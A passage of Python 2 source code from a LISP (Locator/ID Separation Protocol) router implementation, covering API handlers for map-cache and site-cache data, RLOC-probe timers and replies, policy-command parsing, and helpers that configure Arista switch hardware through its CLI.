return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
x, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
